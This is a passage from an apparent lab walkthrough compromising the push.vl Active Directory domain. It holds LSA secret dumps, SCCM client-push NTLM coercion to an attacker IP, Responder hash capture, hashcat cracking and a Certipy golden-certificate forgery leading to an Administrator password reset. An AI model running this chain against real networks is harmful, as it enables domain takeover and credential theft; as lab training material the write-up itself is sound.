PUSH.VL/sccadmin:$DCC2$10240#sccadmin#0c59b319594744abea7f2db17a2fa65c: (2023-08-31 10:26:08)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
PUSH\MS01$:plain_password_hex:a8588fd11b4f63e1b5a84c2d2cdc4bcae3545f793c7228a77e1ad868edbb9e701ab3e81c4d8c864e58b3d7a01faaeff9facf4536a4129cdae629bdbf445c5a66e6bd6382f3e9184613bdb6031d6c0e04cd123e26ce746c5f0727e81e78ac7d69f2b9b7f5b5d8d8c5c8019e03a7333a5cca60683f3d9c72b0a828bcd04d36a0ba5fd99774d76d609d632641a2047be57041bd3d331872416ba5309f323219cd8d2c608e17153e731a689adfcf7a0163d84477cc1f2d60d63a61b5056a15d2ab00394db19fe60c91380a6495a824b63bf3008de0dbd74b044b5e04a4741f71a1dd224fc60e35c19eb226848814b101c6f6
PUSH\MS01$:aad3b435b51404eeaad3b435b51404ee:31fd133d27babb3790e451b6aeea7886:::
[*] DefaultPassword
PUSH\kelly.hill:ShinraTensei!
[*] DPAPI_SYSTEM
dpapi_machinekey:0x83f7bbd4976dba3418fe397e76d9690c06ee3691
dpapi_userkey:0xe2af091346d181301ff638320e3246e49b9b637c
[*] NL$KM
0000 B6 96 C7 7E 17 8A 0C DD 8C 39 C2 0A A2 91 24 44 ...~.....9....$D
0010 A2 E4 4D C2 09 59 46 C0 7F 95 EA 11 CB 7F CB 72 ..M..YF........r
0020 EC 2E 5A 06 01 1B 26 FE 6D A7 88 0F A5 E7 1F A5 ..Z...&.m.......
0030 96 CD E5 3F A0 06 5E C1 A5 01 A1 CE 8C 24 76 95 ...?..^......$v.
NL$KM:b696c77e178a0cdd8c39c20aa2912444a2e44dc2095946c07f95ea11cb7fcb72ec2e5a06011b26fe6da7880fa5e71fa596cde53fa0065ec1a501a1ce8c247695
[*] Cleaning up...
[*] Stopping service RemoteRegistry
Path 2: Privilege Escalation via SCCM NTLM Relay
Discovering the MS01 is a Certificate Authority Server
sliver (http-vulnlabs-4444) > sa-adcs-enum
[*] Successfully executed sa-adcs-enum (coff-loader)
[*] Got output:
[*] Found 1 CAs in the domain
[*] Listing info for CN=CA,CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration,DC=push,DC=vl
Enterprise CA Name : CA
DNS Hostname : MS01.push.vl
Flags : SUPPORTS_NT_AUTHENTICATION CA_SERVERTYPE_ADVANCED
Expiration : 1 years
CA Cert :
Subject Name : DC=vl, DC=push, CN=CA
Thumbprint : 9dd0081d82796853df4bfb79b3057c5aeaf0b15b
Serial Number : 72533888abc96d43a299917a621b857d
Start Date : 8/31/2023 07:25:21
End Date : 8/31/3022 07:35:21
Chain : DC=vl, DC=push, CN=CA
<SNIF>
Discovering Microsoft Endpoint Configuration Manager installed on MS01
# echo 'Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Select DisplayName,DisplayVersion,InstallLocation' | base64 -w0 | xclip -sel clip
sliver (http-vulnlabs-4444) > sharpsh -- '-e -c R2V0LUl0ZW1Qcm9wZXJ0eSBIS0xNOlxTb2Z0d2FyZVxNaWNyb3NvZnRcV2luZG93c1xDdXJyZW50VmVyc2lvblxVbmluc3RhbGxcKiB8IFNlbGVjdCBEaXNwbGF5TmFtZSxEaXNwbGF5VmVyc2lvbixJbnN0YWxsTG9jYXRpb24K'
[*] sharpsh output:
DisplayName DisplayVersion InstallLocation
----------- -------------- ---------------
Amazon EC2Launch 2.0.1521.0
Microsoft .NET Host - 7.0.10 (x64) 56.43.64668
aws-cfn-bootstrap 2.0.26
Configuration Manager Client 5.00.9111.1000
<SNIF>
sliver (http-vulnlabs-4444) > execute-assembly /home/Intrusionz3r0/Documents/Tools/SharpCollection/NetFramework_4.7_x64/SharpSCCM.exe local site-info
[*] Output:
_______ _ _ _______ ______ _____ _______ _______ _______ _______
|______ |_____| |_____| |_____/ |_____] |______ | | | | |
______| | | | | | \_ | ______| |______ |______ | | | @_Mayyhem
[+] Connecting to \\127.0.0.1\root\CCM
[+] Executing WQL query: SELECT Name,CurrentManagementPoint FROM SMS_Authority
-----------------------------------
SMS_Authority
-----------------------------------
CurrentManagementPoint: DC01.push.vl
Name: SMS:HQ0
-----------------------------------
[+] Completed execution in 00:00:00.2286036
Coercing SCCM NTLM Authentication
sliver (http-vulnlabs-4444) > sharpsccm invoke client-push -t 10.8.5.48
[*] sharpsccm output:
_______ _ _ _______ ______ _____ _______ _______ _______ _______
|______ |_____| |_____| |_____/ |_____] |______ | | | | |
______| | | | | | \_ | ______| |______ |______ | | | @_Mayyhem
[+] Querying the local WMI repository for the current management point and site code
[+] Connecting to \\127.0.0.1\root\CCM
[+] Current management point: DC01.push.vl
[+] Site code: HQ0
[+] Created "ConfigMgr Client Messaging" certificate in memory for device registration and signing/encrypting subsequent messages
[+] Reusable Base64-encoded certificate:
308209D20201033082098E06092A864886F70D010701A082097F0482097B308209773082059006092A864886F70D010701A08205810482057D3082057930820575060B2A864886F70D010C0A0102A08204EE308204EA301C060A2A864886F70D010C0103300E04081E4870643C705F7F020207D0048204C866080A6B3DAD8CDD40432D2C12B2BE58F2FB4F790B1D2312E08F94313ACE7793D01FE8F97235A7FB9197F436C48EFCB0315305B476320718BD46D02C96A1FEBCF084A5B11B08FD32A6DC2E857412CE9B25E3A983D0F7FB3C5D1C801EBBB0CA7B61D4730D4B3EA53F248D18AACD21C1E6A09E1AD8405357E2CA1EBE8DDEFCE6805193F8CCE11D318B88741EAA3C99087894BCE39CFBB0F30AC928D88B112D658284EF9766AA5C0D28E03AC5969C4C276FA767C5C6FE24119CB5436C12E997DD6D1CCCA76FBBC81725E14160DCBD9E12585E79D5871EC774A93A910B7D40E52BFF7B76875AF0EDE16A7E06A2437FBA8B66AF5A2BEE3A2CB3C19B17ECA752885FF4106BD4B20CCAE4FAD8E187BAC16B9D5DBFC70B10ECB41CC6A35282B43BC35846E3A165B3BC78E2DFC6FE3A075334BC2BE0F21C821A25F6B024370345A1B3764AF2A523C3DEAA7897500AC06A65E37FF836456EEA3A45560E319B5250A4639BBB117488FDBCB3F591A4425749ACF27C3018E25E6932BDF353E3CFE5AD4717CB55B1A5FD42FE1AB4070AC33C054085B95F912AB3DA84FA961DFE87EBF2DFAC80050C74E417E7B12D1318B8D99AD13F2650F7D82E611A0B3A690109DBABBF994B32623D4D50DB3F47F4520715317EAA6D67461312D9A9E166C257FE17F1BCB3E633E31B696EB0A5A986BD9DB0397166234414D0CF9F148337DE037E79571E651D29184F335E2DBB6D6E9E7B2632114A8FA7E8D1C30B7522F7F8C9C232C1890D805C6AE22111D6C324716C33352D9D86D2952CAAD59F53846C1C754ECBABD5E6ED60CE14FB5201F9214298FCC0A3D11530F87FD7A4A4E12E350083331BC3CEFB22BAD73A89313F6DC64A3137251F260262DCC9CBF5C91969B322148795014B41859AEF3BE6801CFDEB96C7CB4EE204113A6351A38E957CAD4F2309207B2351C5F4AA0FB9F29538E16979B363E12C1E538F7BECAEE18F7C24BB19DCE0FCF4912E46FBFFC29BAFF58B75178086AF18204C837035732DEA32A0BFEDB94A7A09BEED2F9EABF475C806B39DA04DC89D27AD96E1CCB6E9B095EE1B13B37F64493CF5BA0C64D73C21C1F39ECF59C87AB9FE794456F3D976D4E2A6B20F59C517DB4F84E7262AF6ABF101F620373CD462985CB7362E09A750ED6D8100E169ECA8D99FCBD7F3A327DFCDA818524A061F1B57164E8BA0EB14B9421534E467B11A46D0736A438702FE04BADCA5C9BB03C7D451F7B923343374E850EA4AB248B346D2663A10A2EEB7948D5C78A6D73AB45A3077F354CA67D83F8E9C38752C31A8C34F25E107658C78B36C85F6C5E3C33F59B7DA809A0D8F42BEA014F6DE5B133135EE25A7AB48AC33915076968864D5DCC9D03C387FEE670D24FB729154E8D3B74DD195EFEC1C2037AA5AB5C8480EF15A08644971AD20127AFC7C99BBE76A91999823A0B69E1681061F8983CB4855A6F0D0254331909B7F227D075AA874476D5B3C70FE0BAD536FF7CED381BECBD6D9FBD67AE1BBF23E6163A192A01BF2D682774099F0950F4215CF49F34BA65B915BD6CFA01ED017825147031E3F1C75F47572B98F3FA59EA74B605DFFA7B89E14C04E3E22B9AD751B6D437CF8D49A5476939FC992478120B134377A2D5FDC8519AB28B597F1BD896EB375D02AF18706F6AD9AEC23D1D979CCAD9DC21F50749CB7327207AB86FB13B0B0F503502F677B100F2A09D94F0708C1EF3E20E81C0DEED3B2AD3174301306092A864886F70D0109153106040401000000305D06092B060104018237110131501E4E004D006900630072006F0073006F0066007400200053006F0066007400770061007200650020004B00650079002000530074006F0072006100670065002000500072006F00760069006400650072308203DF06092A864886F70D010706A08203D0308203CC020100308203C506092A864886F70D010701301C060A2A864886F70D010C0103300E040874F81FC3C6A7ED45020207D0808203989B825DA04F323EFF224EF499EE6C592DDD06F60092F58145E9D33EFF20245547CB040CA3095E751D84B9D2888B46119B21D88028F308152B7DE411A43BC81F30D72917E382B4B157B3DE2BC5B5769AA59C734B4FDC21529BA15453DF09DB8766E68FA901DEEC66630CFF7C758BF38DAC145CC6109EEC755B0398EF85405239BDADE93AD11AE6E46F3D77F9AF1DB6B1E546995532BD183F9109BABD9ADF33989D8BCA2B54B54D129D43E71D2D20AD8B73DE204FDEC3B61A1B994A2E7EF335CA63F254D65EB484C59CBD126AA5E675982C786E3D6062F5254EBE8DF33645FBC91238B8E4E73C59044E0C2F273AB99E4C787575981EA753E4031C25BA0FD859D60FA3274F2E3B293536FC3FC0662D6E6BB9B99BDF2BDC3BC512C9E80BC7EBA492284BBC1CF70354E1F64771ECCCEE166AF6B9224D2C2F0B8609967ABEA6E92D017520A7853D3FED66FB96D4F1EFDC47034508FEDEFD6B372C69B971766CB712567A3E7582F230B755D71DA0EC2122EE2C24DB3C52E50C410995A7BA94E76CC6C8635052237DCF4C7718B8E17388DB5B413D03756C86A510E19AAD0FAF16939811E0DF5B98D6C3DD91A259D3142B1258630945F51BA65CCA510205FFD7C282AD927533BA317821D50E1B0D99F9CB68AE198CEE7DAD2D08D8873E4A000320923285DDF2C4D7DF17080927D64549FF0540C03A7892314767C17785D4DAC4968071AC6FB655B590D4496198D5B3664C048480DE91ACCEEF3B0403D7732DE1FAB692148F9D9C7B6616D669DE5339B3DC15061CC76D881D0769420BE75F35FBDB4EB22783A55CBC3FE61E700232B179DBF2EC55120F8D4E52BBE75E9E27C11C1A9963A9D7BCC609E0D62CC12F29A236A7AA590CAB9E5445233803E3323934BA2434179A0C9305A646B2FCB317EA3B22D98FC45DB09D6A211F97D31CCCB7A55F1797D3EBA855EDCC2D3130FBA068C52270D033D70A9C8BF774E2CC198A6667D6E74E7257F21BF64CCEC0F838DE791850ABB75BCA20D3F9BB7B85D8026C8A366AB9A0FAB3F3341B6A5E8B93FBD919F5DEFBB09C3A178ACDEA08A451D1FEED45961382F16A82EE538706FDD9C9C218B253663CEE2C487F276391E2BF838D1E6C454F4226E9B2F99838787F56C690E9D9B4C116E180A3F2A699B1EC54CF1D35B6CA18EFCE751D02998B4036836B6F81278ED0EE692ECA6E03807DA309E572AB24E1299E8A632541B02259DFAD21A8D6CB6101A6C680C59F52DE00EADB329BF09B6801226C4C7A328F45B40C9F0936653F94CC1D8A6D7C01A65B1678A7BB67303B301F300706052B0E03021A04146F8FF3B5C5B15E1F36C51A3D899C34F33E9A9C9A0414FC814D0775146019B99313D7630C216362EA93AE020207D0
[+] Discovering local properties for client registration request
[+] Modifying client registration request properties:
FQDN: 10.8.5.48
NetBIOS name: 10.8.5.48
Site code: HQ0
[+] Sending HTTP registration request to DC01.push.vl:80
[+] Received unique SMS client GUID for new device:
GUID:A6D63769-A669-41FD-BAD4-1FBCB0399C01
[+] Discovering local properties for DDR inventory report
[+] Modifying DDR and inventory report properties
[+] Discovered PlatformID: Microsoft Windows NT Advanced Server 10.0
[+] Modified PlatformID: Microsoft Windows NT Workstation 2010.0
[+] Sending DDR from GUID:A6D63769-A669-41FD-BAD4-1FBCB0399C01 to MP_DdrEndpoint endpoint on DC01.push.vl:HQ0 and requesting client installation on 10.8.5.48
[+] Completed execution in 00:00:06.4432509
Retrieving NTLMv2 Hashes
❯ sudo responder -I tun0
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.5.0
[SMB] NTLMv2-SSP Client : 10.10.170.85
[SMB] NTLMv2-SSP Username : PUSH\sccadmin
[SMB] NTLMv2-SSP Hash : sccadmin::PUSH:aaaaaaaaaaaaaaaa:5b4978cb8424d7817455c8d75be9caac:0101000000000000006bc5f088c3db0189535b04c9036121000000000100100077006300700045004e004200450054000300100077006300700045004e00420045005400020010006d00490072005a004d0049007a006500040010006d00490072005a004d0049007a00650007000800006bc5f088c3db0106000400020000000800300030000000000000000000000000400000a4466ef19d5811bb4240ed56c011010ce7eda97943f24e4c68de6c803f22f8000a0010000000000000000000000000000000000009001c0063006900660073002f00310030002e0038002e0035002e00340038000000000000000000
[SMB] NTLMv2-SSP Client : 10.10.170.85
[SMB] NTLMv2-SSP Username : PUSH\DC01$
[SMB] NTLMv2-SSP Hash : DC01$::PUSH:aaaaaaaaaaaaaaaa:93a4f8afc63fa09c142a924c8ac28a9d:010100000000000080015ef188c3db0179175cc0b27c3f02000000000100100077006300700045004e004200450054000300100077006300700045004e00420045005400020010006d00490072005a004d0049007a006500040010006d00490072005a004d0049007a0065000700080080015ef188c3db0106000400020000000800300030000000000000000000000000400000a4466ef19d5811bb4240ed56c011010ce7eda97943f24e4c68de6c803f22f8000a0010000000000000000000000000000000000009001c0063006900660073002f00310030002e0038002e0035002e00340038000000000000000000
Cracking sccadmin's NTLMv2 hash
❯ hashcat -m 5600 sccadmin /usr/share/wordlists/rockyou.txt
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
SCCADMIN::PUSH:4a38e3a4e3ca2b52:2dd5c9b84c96005d00225ed382dc85fd:0101000000000000009c113df2c2db01bfaa5559084859260000000002000800300045005900510001001e00570049004e002d0031003000560052004700440049004c004d004200570004003400570049004e002d0031003000560052004700440049004c004d00420057002e0030004500590051002e004c004f00430041004c000300140030004500590051002e004c004f00430041004c000500140030004500590051002e004c004f00430041004c0007000800009c113df2c2db0106000400020000000800300030000000000000000000000000400000b4f4ce1a26e269913204d2ddfc3349df74620108e39a9e05f08f2dbe04a91a2c0a0010000000000000000000000000000000000009001c0063006900660073002f00310030002e0038002e0035002e00340038000000000000000000:7ujm&UJM
Credentials found: sccadmin:7ujm&UJM
Compromise Domain Controler DC01
Path: 1 Golden Certificate Attack
❯ certipy-ad forge -ca-pfx CA.pfx -upn administrator@push.vl -subject 'CN=Administrator,CN=Users,DC=PUSH,DC=VL'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Saved forged certificate and private key to 'administrator_forged.pfx'
❯ certipy-ad auth -pfx administrator_forged.pfx -username Administrator -domain push.vl -dc-ip 10.10.170.85
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@push.vl
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERROR_CLIENT_NOT_TRUSTED(Reserved for PKINIT)
❯ certipy-ad auth -pfx administrator_forged.pfx -username Administrator -domain push.vl -dc-ip 10.10.170.85 -ldap-shell
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Connecting to 'ldaps://10.10.170.85:636'
[*] Authenticated to '10.10.170.85' as: u:PUSH\Administrator
Type help for list of commands
# change_password Administrator Password123!
Got User DN: CN=Administrator,CN=Users,DC=push,DC=vl
Attempting to set new password of: Password123!
Password changed successfully!
❯ xfreerdp /v:DC01 /u:Administrator /p:Password123! /dynamic-resolution

Path 2: Create a vulnerable template
Last updated